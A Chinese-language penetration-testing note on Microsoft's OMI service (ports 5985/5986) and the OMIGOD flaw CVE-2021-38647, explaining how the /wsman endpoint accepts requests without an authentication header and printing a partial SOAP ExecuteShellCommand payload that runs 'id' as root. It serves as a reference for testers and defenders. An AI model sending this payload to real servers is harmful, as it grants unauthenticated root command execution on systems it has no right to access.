5985,5986 - Pentesting OMI

基本信息

OMI 是微软推出的一款开源工具，用于远程配置管理。它对于在 Azure 上使用以下服务的 Linux 服务器尤为重要：

• Azure 自动化

• Azure 自动更新

• Azure 运营管理套件

• Azure 日志分析

• Azure 配置管理

• Azure 诊断

当这些服务被激活时，进程 omiengine 会以 root 身份启动并在所有接口上监听。

使用的默认端口为 5985（http）和 5986（https）。

CVE-2021-38647 漏洞

2021 年 9 月 16 日观察到，在 Azure 部署的 Linux 服务器中，由于使用了易受攻击的 OMI 版本，存在漏洞。该漏洞存在于 OMI 服务器通过 /wsman 端点处理消息时，无需身份验证头部即可授权客户端的情况。

攻击者可以利用这一点，发送不带身份验证头部的“ExecuteShellCommand” SOAP 负载，迫使服务器以 root 权限执行命令。

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

参考资料

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/